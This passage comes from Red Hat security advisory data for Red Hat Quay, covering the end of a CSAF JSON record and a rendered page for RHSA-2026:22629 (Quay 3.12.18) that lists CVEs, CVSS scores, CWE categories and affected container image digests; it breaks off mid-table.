            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
    }
  ]
}

RHSA-2026:22629

Vulnerability from csaf_redhat - Published: 2026-06-02 18:16 - Updated: 2026-06-30 15:25

Summary

Red Hat Security Advisory: Red Hat Quay 3.12.18

Severity

Important

Notes

Topic: Red Hat Quay 3.12.18 is now available with bug fixes.

Details: Quay 3.12.18

CVE-2025-62718

7.0 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE-1289 - Improper Validation of Unsafe Equivalence in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Important

CVE-2026-2377

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-32281

5.9 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1050 - Excessive Platform Resource Consumption within a Loop

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-32282

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition

Affected products

Fixed 4 products

Product	Version	Remediation
